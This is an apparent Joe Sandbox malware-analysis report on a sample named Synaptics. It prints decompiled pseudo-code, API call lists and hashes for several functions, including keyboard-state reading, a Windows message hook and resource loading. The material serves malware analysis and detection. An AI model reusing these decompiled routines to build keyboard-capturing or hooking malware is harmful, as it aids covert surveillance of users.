                                                                                                                                                                                                                            0x0040e278
                                                                                                                                                                                                                            0x0040e2c5
                                                                                                                                                                                                                            0x0040e2c5
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040E268
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32 ref: 0040E19E
                                                                                                                                                                                                                              • Part of subcall function 0040E0FC: GetCPInfo.KERNEL32(00000000,?), ref: 0040E115
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocaleStringThreadType
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1505017576-0
                                                                                                                                                                                                                            • Opcode ID: f7ab25cde628a71b1d3e7a452f9e7330cfbb9f35bc13c410db0fd2e7b91e3e0a
                                                                                                                                                                                                                            • Instruction ID: 1e0c14cada7a8142f74d55e3307cde86d26a5cdea6c2c893cd231fda4e8750a6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7ab25cde628a71b1d3e7a452f9e7330cfbb9f35bc13c410db0fd2e7b91e3e0a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C13124316443958AE720D7A7AC017663B99E762344F0888FFE484AB3D2EB7C4855876F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00428D80 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E00428D80(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				struct HDC__* _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				struct HDC__* _t66;
				void* _t67;
				intOrPtr _t76;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;

				_t84 = _t86;
				_push(_t67);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E004259F4(_v8);
					_push(_t84);
					_push(0x428e5f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					E0042A188( *((intOrPtr*)(_v8 + 0x58)));
					E00428BFC( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					_t47 = E0042A288( *((intOrPtr*)(_v8 + 0x58)));
					_push(0);
					L004072E0();
					_t66 = _t47;
					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t81 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
					}
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
					_t82 =  *((intOrPtr*)(_t54 + 0x10));
					if(_t82 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						_push(0xffffffff);
						_push(_t82);
						_push(_t66);
						L00407440();
						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
						_push(_t66);
						L00407418();
					}
					E00425CE8(_v8, _t66);
					_t58 =  *0x49b8ac; // 0x21e0acc
					E0041AFE4(_t58, _t66, _t67, _v8, _t82);
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x428e66);
					return E00425B60(_v8);
				}
			}



















                                                                                                                                                                                                                            0x00428d81
                                                                                                                                                                                                                            0x00428d83
                                                                                                                                                                                                                            0x00428d86
                                                                                                                                                                                                                            0x00428d89
                                                                                                                                                                                                                            0x00428d90
                                                                                                                                                                                                                            0x00428e6a
                                                                                                                                                                                                                            0x00428d96
                                                                                                                                                                                                                            0x00428d99
                                                                                                                                                                                                                            0x00428da0
                                                                                                                                                                                                                            0x00428da1
                                                                                                                                                                                                                            0x00428da6
                                                                                                                                                                                                                            0x00428da9
                                                                                                                                                                                                                            0x00428db2
                                                                                                                                                                                                                            0x00428dc3
                                                                                                                                                                                                                            0x00428dce
                                                                                                                                                                                                                            0x00428dd3
                                                                                                                                                                                                                            0x00428dd5
                                                                                                                                                                                                                            0x00428dda
                                                                                                                                                                                                                            0x00428de5
                                                                                                                                                                                                                            0x00428dea
                                                                                                                                                                                                                            0x00428e00
                                                                                                                                                                                                                            0x00428dec
                                                                                                                                                                                                                            0x00428df6
                                                                                                                                                                                                                            0x00428df6
                                                                                                                                                                                                                            0x00428e09
                                                                                                                                                                                                                            0x00428e0c
                                                                                                                                                                                                                            0x00428e11
                                                                                                                                                                                                                            0x00428e2f
                                                                                                                                                                                                                            0x00428e13
                                                                                                                                                                                                                            0x00428e13
                                                                                                                                                                                                                            0x00428e15
                                                                                                                                                                                                                            0x00428e16
                                                                                                                                                                                                                            0x00428e17
                                                                                                                                                                                                                            0x00428e1f
                                                                                                                                                                                                                            0x00428e22
                                                                                                                                                                                                                            0x00428e23
                                                                                                                                                                                                                            0x00428e23
                                                                                                                                                                                                                            0x00428e37
                                                                                                                                                                                                                            0x00428e3f
                                                                                                                                                                                                                            0x00428e44
                                                                                                                                                                                                                            0x00428e4b
                                                                                                                                                                                                                            0x00428e4e
                                                                                                                                                                                                                            0x00428e51
                                                                                                                                                                                                                            0x00428e5e
                                                                                                                                                                                                                            0x00428e5e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(0049E8C8,00000000,004244A2,00000000,00424501), ref: 004259FC
                                                                                                                                                                                                                              • Part of subcall function 004259F4: RtlLeaveCriticalSection.KERNEL32(0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A09
                                                                                                                                                                                                                              • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(00000038,0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A12
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                                                                                                                                                                                              • Part of subcall function 0042A288: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9B380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000,00428E5F), ref: 00428DD5
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00428DEE
                                                                                                                                                                                                                            • 73C9B410.GDI32(00000000,?,000000FF,00000000,00000000,00428E5F), ref: 00428E17
                                                                                                                                                                                                                            • 73C9B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,00428E5F), ref: 00428E23
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2198039625-0
                                                                                                                                                                                                                            • Opcode ID: 06edad1a3cdf261bad1c94378f0d5fdbdf9d6fe4f865de9f2575fa66755788ab
                                                                                                                                                                                                                            • Instruction ID: e9c466939ba293ac9df73ed0eb373398a4389f67f4d1c2ae1c2642ffffdfa89f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06edad1a3cdf261bad1c94378f0d5fdbdf9d6fe4f865de9f2575fa66755788ab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2314870B05624EFC704DB59D981D5EB7E4EF08324BA241AAF404AB362CB38EE40DB54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0047689C Relevance: 6.1, APIs: 4, Instructions: 81keyboardCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                            			E0047689C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				short _v6;
				char _v262;
				int _v268;
				char _v272;
				struct HKL__* _t25;
				struct HKL__* _t28;
				int _t30;
				void* _t45;
				unsigned int _t52;
				intOrPtr _t56;
				int _t65;
				void* _t68;

				_v272 = 0;
				_v268 = 0;
				_t45 = __edx;
				_push(_t68);
				_push(0x47699d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffef4;
				 *0x49ec4c = GetKeyboardLayout(0);
				GetKeyboardState( &_v262);
				_t25 =  *0x49ec4c; // 0x0
				_t28 =  *0x49ec4c; // 0x0
				_t65 =  *(_t45 + 4);
				_t30 = ToAsciiEx(_t65, MapVirtualKeyExA(_t65, 2, _t28),  &_v262,  &_v6, 0, _t25);
				_t52 =  *(_t45 + 8);
				if((_t52 & 0x80000000) != 0) {
					if((_t52 >> 0x0000001f & 0x00000001) == 1 && _t30 < 1 &&  *0x49ec50 != 0) {
						E00404BA8();
						E00476A9C(_t45, _v272,  *(_t45 + 4));
					}
				} else {
					if(_t30 <= 0) {
						 *0x49ec50 =  *(_t45 + 4);
					} else {
						E00404BA8();
						E00476A9C(_t45, _v268,  *(_t45 + 4));
						 *0x49ec50 = 0;
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x4769a4);
				return E004049E4( &_v272, 2);
			}















                                                                                                                                                                                                                            0x004768aa
                                                                                                                                                                                                                            0x004768b0
                                                                                                                                                                                                                            0x004768b6
                                                                                                                                                                                                                            0x004768bc
                                                                                                                                                                                                                            0x004768bd
                                                                                                                                                                                                                            0x004768c2
                                                                                                                                                                                                                            0x004768c5
                                                                                                                                                                                                                            0x004768cf
                                                                                                                                                                                                                            0x004768db
                                                                                                                                                                                                                            0x004768e0
                                                                                                                                                                                                                            0x004768f3
                                                                                                                                                                                                                            0x004768fb
                                                                                                                                                                                                                            0x00476906
                                                                                                                                                                                                                            0x0047690b
                                                                                                                                                                                                                            0x00476914
                                                                                                                                                                                                                            0x00476952
                                                                                                                                                                                                                            0x0047696a
                                                                                                                                                                                                                            0x0047697a
                                                                                                                                                                                                                            0x0047697a
                                                                                                                                                                                                                            0x00476916
                                                                                                                                                                                                                            0x00476918
                                                                                                                                                                                                                            0x00476944
                                                                                                                                                                                                                            0x0047691a
                                                                                                                                                                                                                            0x00476923
                                                                                                                                                                                                                            0x00476933
                                                                                                                                                                                                                            0x0047693a
                                                                                                                                                                                                                            0x0047693a
                                                                                                                                                                                                                            0x00476918
                                                                                                                                                                                                                            0x00476981
                                                                                                                                                                                                                            0x00476984
                                                                                                                                                                                                                            0x00476987
                                                                                                                                                                                                                            0x0047699c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyboardLayout.USER32(00000000), ref: 004768CA
                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,00000000,00000000,0047699D), ref: 004768DB
                                                                                                                                                                                                                            • MapVirtualKeyExA.USER32 ref: 004768FF
                                                                                                                                                                                                                            • ToAsciiEx.USER32(?,00000000,?,00000002,00000000,?), ref: 00476906
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Keyboard$AsciiLayoutStateVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 692081290-0
                                                                                                                                                                                                                            • Opcode ID: 369cad89c0988fd3de251049eacc826bb87c6d6fc67fae28854ac0164a97fde1
                                                                                                                                                                                                                            • Instruction ID: 89de63ba6f27cd6f45779958db8435fcd8f77a32cbffcd1c99df830e07254f94
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 369cad89c0988fd3de251049eacc826bb87c6d6fc67fae28854ac0164a97fde1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D21B1B05045049EDB10DF15CC82BEA77BAEB59310F05C4B7E988A7341DA38AD408F59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044E7A8 Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0044E7A8(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E0044DEB4(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E0044DD30(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E0044DD30(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E0040A044(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00409F88(_a12, _t49);
				}
			}










                                                                                                                                                                                                                            0x0044e7af
                                                                                                                                                                                                                            0x0044e7b1
                                                                                                                                                                                                                            0x0044e7b3
                                                                                                                                                                                                                            0x0044e7be
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044e842
                                                                                                                                                                                                                            0x0044e7c2
                                                                                                                                                                                                                            0x0044e7d2
                                                                                                                                                                                                                            0x0044e7ef
                                                                                                                                                                                                                            0x0044e7f4
                                                                                                                                                                                                                            0x0044e7f9
                                                                                                                                                                                                                            0x0044e806
                                                                                                                                                                                                                            0x0044e806
                                                                                                                                                                                                                            0x0044e7d4
                                                                                                                                                                                                                            0x0044e7db
                                                                                                                                                                                                                            0x0044e7e8
                                                                                                                                                                                                                            0x0044e7e8
                                                                                                                                                                                                                            0x0044e80d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044e80f
                                                                                                                                                                                                                            0x0044e812
                                                                                                                                                                                                                            0x0044e821
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044e829

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$ItemStateString
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 306270399-0
                                                                                                                                                                                                                            • Opcode ID: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                                                                                                                                                                                            • Instruction ID: 91f26849067dd0ec4125c5b687d67a274517b3145466c284ab5c31d893fdeaa7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43118131A05204AFDB00EE6ECC85AAF77E8AF49364B10442AF915D7382DA39DD0197A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00474C10 Relevance: 6.1, APIs: 4, Instructions: 58libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 55%
                                                                                                                                                                                                                            			E00474C10(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				void* _t19;
				intOrPtr _t35;
				intOrPtr _t36;
				struct HINSTANCE__* _t40;
				void* _t42;
				void* _t43;
				intOrPtr _t44;

				_t42 = _t43;
				_t44 = _t43 + 0xfffffff8;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t42);
				_push(0x474cbf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44;
				_push(_t42);
				_push(0x474c8c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t44;
				_t40 = LoadLibraryA(E00404E80(_v8));
				_t19 = FindResourceA(_t40, E00404E80(_v12), 0xa);
				if(_t19 != 0) {
				}
				FreeResource(_t19);
				FreeLibrary(_t40);
				_pop(_t35);
				 *[fs:eax] = _t35;
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(E00474CC6);
				return E004049E4( &_v12, 2);
			}












                                                                                                                                                                                                                            0x00474c11
                                                                                                                                                                                                                            0x00474c13
                                                                                                                                                                                                                            0x00474c19
                                                                                                                                                                                                                            0x00474c1c
                                                                                                                                                                                                                            0x00474c22
                                                                                                                                                                                                                            0x00474c2a
                                                                                                                                                                                                                            0x00474c31
                                                                                                                                                                                                                            0x00474c32
                                                                                                                                                                                                                            0x00474c37
                                                                                                                                                                                                                            0x00474c3a
                                                                                                                                                                                                                            0x00474c3f
                                                                                                                                                                                                                            0x00474c40
                                                                                                                                                                                                                            0x00474c45
                                                                                                                                                                                                                            0x00474c48
                                                                                                                                                                                                                            0x00474c59
                                                                                                                                                                                                                            0x00474c67
                                                                                                                                                                                                                            0x00474c6e
                                                                                                                                                                                                                            0x00474c6e
                                                                                                                                                                                                                            0x00474c77
                                                                                                                                                                                                                            0x00474c7d
                                                                                                                                                                                                                            0x00474c84
                                                                                                                                                                                                                            0x00474c87
                                                                                                                                                                                                                            0x00474ca6
                                                                                                                                                                                                                            0x00474ca9
                                                                                                                                                                                                                            0x00474cac
                                                                                                                                                                                                                            0x00474cbe

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00474C8C,?,00000000,00474CBF,?,?,?,00000000), ref: 00474C54
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 00474C67
                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF,?,?,?,00000000), ref: 00474C77
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF,?,?,?,00000000), ref: 00474C7D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeLibraryResource$FindLoad
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 622515136-0
                                                                                                                                                                                                                            • Opcode ID: 842c4bf313bb0d58b6a8af23bafa00ad1df199db71c20f9afadcfabe7108ff4f
                                                                                                                                                                                                                            • Instruction ID: 3bce9edae1ef54d3e8e9fd7389a7dc52dea682d655a911964018c4ee56d4c8a4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 842c4bf313bb0d58b6a8af23bafa00ad1df199db71c20f9afadcfabe7108ff4f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC0108B0A046046FE702AB62CD129BF77ADEBC5724B21857BF804A26D1DB3C5D01C55D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00438CE0 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E00438CE0(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t9;
				signed int _t16;
				struct HWND__* _t19;
				DWORD* _t20;

				_t17 = __ecx;
				_push(__ecx);
				_t19 = __eax;
				_t16 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
					_t9 =  *0x49eb28; // 0x21e1290
					if(GlobalFindAtomA(E00404E80(_t9)) !=  *0x49eb24) {
						_t16 = 0 | E00437E28(_t19, _t17) != 0x00000000;
					} else {
						_t16 = 0 | GetPropA(_t19,  *0x49eb24 & 0x0000ffff) != 0x00000000;
					}
				}
				return _t16;
			}







                                                                                                                                                                                                                            0x00438ce0
                                                                                                                                                                                                                            0x00438ce2
                                                                                                                                                                                                                            0x00438ce3
                                                                                                                                                                                                                            0x00438ce5
                                                                                                                                                                                                                            0x00438ce9
                                                                                                                                                                                                                            0x00438d00
                                                                                                                                                                                                                            0x00438d17
                                                                                                                                                                                                                            0x00438d37
                                                                                                                                                                                                                            0x00438d19
                                                                                                                                                                                                                            0x00438d29
                                                                                                                                                                                                                            0x00438d29
                                                                                                                                                                                                                            0x00438d17
                                                                                                                                                                                                                            0x00438d3f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00438CED
                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,00438D58,00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438CF6
                                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(00000000), ref: 00438D0B
                                                                                                                                                                                                                            • GetPropA.USER32 ref: 00438D22
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2582817389-0
                                                                                                                                                                                                                            • Opcode ID: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                                                                                                                                                                                            • Instruction ID: e92755073dd59f3c21f23970beea19c54b642f04f63fe31ed46c29e0623daff0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17F02761B06722539621B3775D8196F518C9E383A8B10453FF840D23C1CA2CFC42C17F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00458F44 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00458F44(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x49ebb8; // 0x21e1714
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x49ebd0 == 0) {
						_t2 = SetWindowsHookExA(3, E00458F00, 0, GetCurrentThreadId());
						 *0x49ebd0 = _t2;
					}
					if( *0x49ebcc == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x49ebcc = _t2;
					}
					if( *0x49ebd4 == 0) {
						_t2 = CreateThread(0, 0x3e8, E00458EA4, 0, 0, _t7);
						 *0x49ebd4 = _t2;
					}
				}
				return _t2;
			}





                                                                                                                                                                                                                            0x00458f45
                                                                                                                                                                                                                            0x00458f51
                                                                                                                                                                                                                            0x00458f5a
                                                                                                                                                                                                                            0x00458f6c
                                                                                                                                                                                                                            0x00458f71
                                                                                                                                                                                                                            0x00458f71
                                                                                                                                                                                                                            0x00458f7d
                                                                                                                                                                                                                            0x00458f87
                                                                                                                                                                                                                            0x00458f8c
                                                                                                                                                                                                                            0x00458f8c
                                                                                                                                                                                                                            0x00458f98
                                                                                                                                                                                                                            0x00458fab
                                                                                                                                                                                                                            0x00458fb0
                                                                                                                                                                                                                            0x00458fb0
                                                                                                                                                                                                                            0x00458f98
                                                                                                                                                                                                                            0x00458fb6

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00458F5C
                                                                                                                                                                                                                            • SetWindowsHookExA.USER32 ref: 00458F6C
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00458F87
                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 00458FAB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateThread$CurrentEventHookWindows
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1195359707-0
